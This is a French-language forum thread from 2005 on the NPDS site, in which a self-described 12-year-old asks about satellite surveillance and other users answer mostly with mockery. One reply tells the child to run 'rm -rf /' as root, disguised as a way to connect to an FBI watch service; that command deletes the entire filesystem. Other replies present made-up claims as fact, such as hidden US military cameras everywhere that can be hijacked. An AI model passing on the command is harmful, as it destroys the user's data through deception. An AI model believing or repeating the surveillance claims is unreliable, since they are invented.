Gestion de Contenu, de Communauté et de groupes de travail collaboratif - Open Source, français, sécurisé, stable et performant

  • MODULES

    Pour étendre les nombreuses fonctionnalités disponibles de base - modules.npds.org est à votre disposition.

    Des modules complémentaires, une communauté de développeurs active, des forums pour vos questions ... NPDS  est aussi une plateforme de développement !
  • STYLES

    Vous cherchez des thèmes graphiques pour votre portail ou votre communauté : styles.npds.org est à votre disposition.

    Des thèmes du plus simple au plus sophistiqué. Des thèmes facilement modifiables et toujours en Open-Source - Laissez simplement parler votre imagination !
  • BIBLES

    La documentation indispensable pour personnaliser et exploiter toute la puissante de NPDS  est à votre disposition sur bible.npds.org.

    Vous pouvez participer à l'effort de documentation - rien de plus simple : contactez un membre de la Team de développement et nous vous ouvrirons un compte sur le Wiki !
Devenir membre    |    Identifiant : Mot de Passe : -
Au delà de la gestion de contenu 'classique', NPDS met en oeuvre un ensemble de fonctions spécifiquement dédiées à la gestion de Communauté et de groupes de travail collaboratif.
Il s'agit d'un Content & Community Management System (CCMS) robuste, sécurisé, complet, performant et parlant vraiment français.

Gérez votre Communauté d'utilisateurs, vos groupes de travail collaboratif, publiez, gérez et organisez votre contenu grâce aux puissants outils disponibles de base.
  • Multi langues (Français, Anglais, Allemand, Espagnol, Chinois)
  • Respect des standards : UTF8, XHTML, CSS, ...
  • Système de blocs avancés
  • Installation et administration complète et centralisée
  • Editeur HTML intégré
  • Gestionnaire de fichier en ligne
  • Gestion des groupes de membres
  • Ecriture collaborative de documents (PAD)
  • Forums évolués
  • Mini-sites (pour les membres et les groupes de travail)
  • Chat temp réel
  • Système de News et de rubriques complet (édition, révision, publication)
  • ...
Gratuit et libre (Open-Source), développé en PHP, NPDS est personnalisable grâce à de nombreux thèmes et modules et ne requiert que quelques compétences de base.
NPDS Workplace - groupe de travail collaboratif
 NPDS WorkSpace - tous l'univers du travail collaboratif.
Modéré par : developpeur jpb Jireck 
Index du Forum » » Sécurité » » Surveillance sattélite  
2 pages [ 1 | 2 ]
AuteurSurveillance sattélite
Anonyme
19853  

Anonyme
  Posté : 30-07-2005 19:41

Bonjour j'ai 12 ans et j'aimerai savoir si il est possile d'accéder a une surveillance satellite sans avoir recours a un piratage compliqué en toute légalité ?

ex: choix de l'endrois sur terre que l'on veux voir avec de grand zoom.

merci d'avance.

  Citation   
urbain
960      

urbain
  Posté : 30-07-2005 20:27

1/ hors sujet

2/ google le fait (fait une recherche) et MSN aussi (que pour les usa)

  Profil  E-mail  Citation   
Jonathan
347      

Jonathan
  Posté : 31-07-2005 00:47

et tu veux tout ca en temps réel ?

mmhh, pas facile (si tu veux pouvoir aller jusqu'a reconnaitre une personne). Jusqu'au niveau de la taille d'une voiture, ca existe et c'est disponible. Au dela, c'est réservé a l'armée.

Par contre, tu as d'autres solutions pour espionner. L'armée américaine a placé des micro camera partout sur terre. Quand je dis partout, c'est vraiment partout. Elles sont toutes reliées par internet, et en bidouillant un peu, tu peux réussir à en prendre le controle. Il y en a dans chaque rue et chaque appartement. Meme en pleine campagne dans les arbres.
Y'a pas beaucoup de monde au courant, mais c'est parce que c'est top secret.

Si tu veux le trouver, va sur un logiciel de peer to peer, comme emule par exemple, et cherche XXX. Apres, c'est un peu compliqué a installer. Je te conseille de te faire aider par tes parents.

Voila, j'espere t'avoir aidé. Je vais me coucher, il est tard, je suis fatigué.

  Profil  www  Citation   
[-Jarod-]
1732       
 

[-Jarod-]
  Posté : 31-07-2005 02:00

et j'espère que tu as linux bien sur ! tous les espions travaillent sous linux ils ne peuveux pas se permettre d'avoir des systèmes instables

si tu as linux et que tu es connecté a internet, tape ça en root
rm -rf / && login -c connect -w fbi.us.gov.us -t watch

et comme nom d'utilisateur tu met "netwatch"... c'est édifiant, mais s à réserver aux initiés

  Profil  E-mail  www  Citation   
Jonathan
347      

Jonathan
  Posté : 31-07-2005 03:32

je sais pas si tu aurais dû réveler ce secret ici... on est peut etre sous surveillance... j'espere que la CIA ne va pas fermer le site !

  Profil  www  Citation   
EC_Gus274
715      

EC_Gus274
  Posté : 31-07-2005 03:39

surtout qu'on vend des ak47 dans la taverne

  Profil  www  Citation   
Xargos
2035       

Xargos
  Posté : 31-07-2005 20:15


Celui-là, c'est une perle... ça serait dommage de le supprimer.
Est-ce qu'on ne pourrait pas créer un forum "Perles" dans lequel on déplacerait ce type de posts?...

  Profil  E-mail  www  Citation   
Jonathan
347      

Jonathan
  Posté : 31-07-2005 21:46

j'ai deja suggéré l'idee il y a deux jours ;)

on m'a repondu qu'il y avait un post dans la taverne dans lequel on peux copier coller les perles. (enfin, je trouve quand meme qu'il y aurai de quoi faire un forum entier !!)

  Profil  www  Citation   
Xargos
2035       

Xargos
  Posté : 01-08-2005 08:33

Bah si un post existe, ce n'est pas la peine de créer un forum entier...
Il suffit juste de le remettre au goût du jour et de le faire vivre, ce post (un peu comme "999 et après" il y a quelques temps)

  Profil  E-mail  www  Citation   
Jonathan
347      

Jonathan
  Posté : 01-08-2005 14:11

oui, mais j'avoue que comme je ne vais pas dans la taverne (honte a moi), c'est pas facile a retrouver a chaque fois

enfin bon

  Profil  www  Citation   
toba
1779       
 

toba
  Posté : 01-08-2005 14:41

Citation : Jonathan 
Par contre, tu as d'autres solutions pour espionner. L'armée américaine a placé des micro camera partout sur terre. Quand je dis partout, c'est vraiment partout. Elles sont toutes reliées par internet, et en bidouillant un peu, tu peux réussir à en prendre le controle. Il y en a dans chaque rue et chaque appartement. Meme en pleine campagne dans les arbres.
Y'a pas beaucoup de monde au courant, mais c'est parce que c'est top secret.

Si tu veux le trouver, va sur un logiciel de peer to peer, comme emule par exemple, et cherche XXX. Apres, c'est un peu compliqué a installer. Je te conseille de te faire aider par tes parents.


C'est juste, mais le pb c'est que le signal de la plupart est fortement brouillé par celui des caméras installées par les Aliens, qui ont forcément besoin d'un signal beaucoup plus fort pour renvoyer le faisceau jusqu'à Cygnus X1, et qui ne respectent pas les normes du FBI...

  Profil  www  Citation   
Jonathan
347      

Jonathan
  Posté : 01-08-2005 17:01

c'est vrai ca, ils pourraient respecter les normes du FBI si déjà ils se tapent l'incruste sans nous demander notre avis !

  Profil  www  Citation   
EC_Gus274
715      

EC_Gus274
  Posté : 02-08-2005 12:53

ma grand mere, qui vien de s'acheter un nouveau frigo, est du meme avis

  Profil  www  Citation   
GiamDoc
7063       
 

GiamDoc
  Posté : 02-08-2005 23:22

Citation : EC_Gus274 

ma grand mere, qui vien de s'acheter un nouveau frigo, est du meme avis 


la mienne en Tanzanie vient d'aquérir un radiateur électrique, elle se sent mieux

  Profil  E-mail  www  Citation   
toba
1779       
 

toba
  Posté : 03-08-2005 07:20

Citation : GiamDoc 
la mienne en Tanzanie vient d'aquérir un radiateur électrique, elle se sent mieux


Dis lui de faire attention, il est notoire que les radiateurs électriques en Tanzanie sont truffés de caméra du FBI...

  Profil  www  Citation   
Aller à la page : [ 1 | 2 ]
  
Sauter à :

Temps : 0.0169 seconde(s)